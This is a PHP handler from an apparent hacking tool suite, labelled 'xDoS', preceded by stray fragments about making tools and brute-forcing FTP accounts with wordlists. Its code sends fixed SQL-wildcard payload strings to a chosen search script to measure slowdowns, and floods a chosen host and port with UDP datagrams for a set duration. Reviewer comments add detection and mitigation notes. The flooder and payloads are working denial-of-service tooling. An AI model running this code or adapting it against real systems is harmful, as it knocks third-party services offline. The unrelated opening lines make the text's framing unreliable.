..I will show you how to create native tools. I'm not going to make a new tool, though; instead, I will show you what is required to create one. You can find all the native tools in the..
AntiFTP uses wordlists to brute-force FTP user accounts.
<?php
/* Handler for xDoS
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 16-04-2015

Request handler with three branches, selected by which POST field is present:
  - sVar      : times HTTP requests to a search script, plain values versus
                wildcard-heavy values, and prints the elapsed time of each.
  - iDuration : sends UDP datagrams to one host:port until the duration expires.
  - neither   : prints the current logging/silence/verbose options and exits.

$_CONTEXT, $_PATHS, $sOut, $sEnd and Screen() are not defined in this file;
presumably they come from the includes below - confirm there.

NOTE(review): no authentication, authorisation or CSRF check is visible in this
file. If the included header does not enforce one, anyone who can POST here can
make this server send outbound HTTP/UDP traffic to a host of their choosing,
including addresses only reachable from the server itself. Confirm in
screen_header.php before exposing this handler.
*/
// No execution time limit, and the script keeps running after the client
// disconnects: a started task cannot be stopped by closing the browser.
set_time_limit(0);
ignore_user_abort(true);
// set variable to be able to save a task
$_MODULE_C = "thc_xd";
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
// options: HTML summary of the three context flags, shown when no task is requested
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
if(isset($_POST['sVar'])){
/*
Attempt to see whether a script could be vulnerable to wildcard attacks.
For best results you should try this on a script that searches a huge amount of records.
More info: https://www.owasp.org/index.php/Testing_for_SQL_Wildcard_Attacks_%28OWASP-DS-001%29

Defender's view: a search endpoint is exposed when user text reaches a
LIKE/pattern match and response time grows with pattern complexity. The usual
mitigations are restricting or escaping pattern metacharacters in search input
and putting a statement timeout on the query.
*/
// Only host, path and query are validated. The scheme is used later when the
// request URL is built but is never checked here, and the host is not
// restricted to any allow-list.
$aUrl = @parse_url($_POST['sUrl']);
if(!isset($aUrl['host']) || $aUrl['host']==""){
die(Screen($sOut."Invalid host or ip address".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if(!isset($aUrl['path']) || $aUrl['path']==""){
die(Screen($sOut."Invalid path to script".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if(!isset($aUrl['query']) || $aUrl['query']==""){
die(Screen($sOut."Invalid query to poison".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_POST['sVar'] = trim($_POST['sVar']);
// The character class has no quantifier, so as written this accepts exactly
// one character from 0-9, a-z, '-' or '_' (case-insensitive).
if(!preg_match('/^([0-9a-z\-_])$/i',$_POST['sVar'])){
die(Screen($sOut."Invalid variable name structure".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_POST['iDelay'] = intval(trim($_POST['iDelay']));
if($_POST['iDelay']<0){
// really funny, you should become a comedian or something..
// (negative delays are clamped to 0)
$_POST['iDelay'] = 0;
}
// Presence-only flag: any submitted iCache value, including an empty one, becomes 1.
$_POST['iCache'] = !isset($_POST['iCache']) ? 0 : 1;
// Same check as above, repeated; sVar has not changed in between.
if(!preg_match('/^([0-9a-z\-_])$/i',$_POST['sVar'])){
die(Screen($sOut."Invalid variable name structure".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// get is always default: anything other than the exact lower-case string "post" selects GET
$_POST['sMethod'] = @$_POST['sMethod']!="post" ? "GET" : "POST";
// create benchmark properties
// Two benchmark types, each with two payload values, two query strings and a
// list of measured durations. 'test' is the plain-value baseline.
$_CONTEXT['benchmarks'] = array();
$_CONTEXT['benchmarks']['test'] = array();
$_CONTEXT['benchmarks']['test']['payload'] = array();
$_CONTEXT['benchmarks']['test']['payload'][0] = "test1";
$_CONTEXT['benchmarks']['test']['payload'][1] = "test2";
$_CONTEXT['benchmarks']['test']['query'] = array();
$_CONTEXT['benchmarks']['test']['query'][0] = "";
$_CONTEXT['benchmarks']['test']['query'][1] = "";
$_CONTEXT['benchmarks']['test']['results'] = array();
// 'wildcards' holds two fixed pattern strings that differ in a single escape
// sequence (%ab versus %aa).
// Detection: both strings are static, so they can be matched verbatim in
// web-server or WAF logs.
$_CONTEXT['benchmarks']['wildcards'] = array();
$_CONTEXT['benchmarks']['wildcards']['payload'] = array();
$_CONTEXT['benchmarks']['wildcards']['payload'][0] = "'%64_[^!_%65/%ab?F%64_D)_(F%64)_%36([)({}%33){()}£$&N%55_)$*£()$*R\"_)][%55](%66[x])%ba][\$*\"£$-9]_%54'";
$_CONTEXT['benchmarks']['wildcards']['payload'][1] = "'%64_[^!_%65/%aa?F%64_D)_(F%64)_%36([)({}%33){()}£$&N%55_)$*£()$*R\"_)][%55](%66[x])%ba][\$*\"£$-9]_%54'";
$_CONTEXT['benchmarks']['wildcards']['query'] = array();
$_CONTEXT['benchmarks']['wildcards']['query'][0] = "";
$_CONTEXT['benchmarks']['wildcards']['query'][1] = "";
$_CONTEXT['benchmarks']['wildcards']['results'] = array();
// make sure the variable exists in the url
$aQuery = @explode("&",$aUrl['query']);
$bValid = false;
for($x=0;$x<count($aQuery);$x++){
// construct search queries
// Pairs are re-joined with "&". For every parameter only the name is copied;
// a value ("=" plus payload) is appended only for the parameter named by sVar.
if($x!=0){
$_CONTEXT['benchmarks']['test']['query'][0] .= "&";
$_CONTEXT['benchmarks']['test']['query'][1] .= "&";
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= "&";
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= "&";
}
$aVarValue = explode("=",$aQuery[$x]);
$_CONTEXT['benchmarks']['test']['query'][0] .= $aVarValue[0];
$_CONTEXT['benchmarks']['test']['query'][1] .= $aVarValue[0];
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= $aVarValue[0];
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= $aVarValue[0];
// loose (==) comparison of the parameter name against sVar
if($aVarValue[0]==$_POST['sVar']){
$_CONTEXT['benchmarks']['test']['query'][0] .= "=".$_CONTEXT['benchmarks']['test']['payload'][0];
$_CONTEXT['benchmarks']['test']['query'][1] .= "=".$_CONTEXT['benchmarks']['test']['payload'][1];
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= "=".$_CONTEXT['benchmarks']['wildcards']['payload'][0];
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= "=".$_CONTEXT['benchmarks']['wildcards']['payload'][1];
$bValid = true;
}
}
if(!$bValid){
die(Screen($sOut."Invalid query, expecting variable name in url".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// looks valid from here, let's see if the host is up before we start benchmarking
// (no reachability check is performed in this file; the first request below is the check)
echo Screen($sOut."<b>".($_POST['iCache']==1 ? "Caching is enabled, sending two different queries per query type" : "Both query types will be run two times")."</b><br /><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// host is up, start benchmarking
// task_start.php presumably records the running task - confirm in that include
include_once($_PATHS['includes_root']."/task_start.php");
// every type of benchmark
foreach($_CONTEXT['benchmarks'] as $sType=>$aValues){
// amount of queries per benchmark
for($x=0;$x<2;$x++){
// NOTE(review): the host from the submitted URL is written into the HTML
// response without encoding; htmlspecialchars() is the usual output encoding
// for this context.
echo "<p><b>".$sType."</b> - sending ".strtolower($_POST['sMethod'])." request ".($x+1)." to ".$aUrl['host']." ...please wait.</p><blockquote>";
// The timer starts before the output flush and cURL setup, so the reported
// duration includes that overhead as well as the request itself.
$iStart = microtime(true);
flush();
ob_flush();
$ch = curl_init();
// With iCache set, request $x sends payload $x (two different values);
// otherwise payload 0 is sent both times.
if($_POST['sMethod']=="GET"){
curl_setopt($ch, CURLOPT_URL, $aUrl['scheme']."://".$aUrl['host'].$aUrl['path']."?".$_CONTEXT['benchmarks'][$sType]['payload'][($_POST['iCache']==1 ? $x : 0)]);
}
else{
curl_setopt($ch, CURLOPT_URL, $aUrl['scheme']."://".$aUrl['host'].$aUrl['path']);
curl_setopt($ch, CURLOPT_POSTFIELDS, $_CONTEXT['benchmarks'][$sType]['payload'][($_POST['iCache']==1 ? $x : 0)]);
}
// Body only, returned as a string. No timeout option is set, so combined with
// set_time_limit(0) a stalled request is bounded only by cURL's defaults.
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Detection: fixed, dated browser User-Agent sent on every request.
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101506 Ubuntu/10.04 (lucid) Firefox/3.6.13 GTB7.1');
// A falsy result ends the run; that covers transport failure and also an
// empty response body (empty string is falsy).
if(!$sResult = @curl_exec($ch)){
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
die(Screen("Can't get headers, are you sure the host is up?".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// results are appended in request order, so index $x is the entry just added
$_CONTEXT['benchmarks'][$sType]['results'][] = microtime(true) - $iStart;
echo "<br />request completed in ".$_CONTEXT['benchmarks'][$sType]['results'][$x]." seconds<br/>";
@curl_close($ch);
if($_POST['iDelay']!=0){
echo "<br />waiting ".$_POST['iDelay']." second(s) for possible next request<br/>";
sleep($_POST['iDelay']);
}
echo"</blockquote>\n";
}
}
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
}
elseif(isset($_POST['iDuration'])){
/* sends udp packets to the specified host

The messages below call this a "scan", but the visible code only writes
datagrams and never reads a reply.
Defender's view: the traffic is bounded only by iDuration, with no pause
between sends. Rate limiting or upstream filtering on the receiving side, and
egress filtering on the network hosting this handler, are the relevant controls.
*/
echo $sOut;
$_POST['iDuration'] = @intval($_POST['iDuration']);
if($_POST['iDuration']<1){
die(Screen("Invalid duration of udp scan".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// gethostbyname() returns its input unchanged when resolution fails, so the
// four-part dot count below is the only failure test applied to the result.
$sIP = @gethostbyname($_POST['sHost']);
$aIP = explode(".",$sIP);
if(count($aIP)!=4){
die(Screen("Failed to convert host to ip address".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$iPort = @intval($_POST['iPort']);
// Upper bound as written is 65355, not the 65535 port maximum.
// poison.php presumably defines Poison(), used in the loop below - confirm.
if($iPort>0 && $iPort<65355){
include_once($_PATHS['module_default_root']."/poison.php");
}
else{
die(Screen("Invalid port number".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// $iStart is assigned but not read again in this file
$iStart = time();
$iEnd = time()+$_POST['iDuration'];
$iScans = 1;
echo Screen("<p><b>initialising scan on host ".$sIP.":".$iPort."</b></p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
include_once($_PATHS['includes_root']."/task_start.php");
// One new socket and one write per iteration; the loop exits only through
// the duration check at the bottom.
while(true){
flush();
ob_flush();
$sPayload = Poison();
echo Screen("<br /><b>connection ".$iScans.":</b> sending ".strlen($sPayload)." bytes of data - ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// UDP is connectionless: an empty $errstr ("completed") only means the local
// socket opened, not that anything was delivered. The return value of
// fsockopen() is not checked before the write and close.
$fp = @fsockopen("udp://".$sIP,$iPort,$errno,$errstr,3);
@fwrite($fp,$sPayload);
echo Screen("<b>".($errstr=="" ? "completed" : $errstr)."</b>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
fclose($fp);
if(time()>=$iEnd){
echo Screen("<p><b>reached total scan duration (".$_POST['iDuration']." second(s)), aborting now...</b></p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
break;
}
$iScans++;
}
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
echo $sEnd;
}
else{
// No task requested: print the page wrapper and the option summary, then stop.
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
?>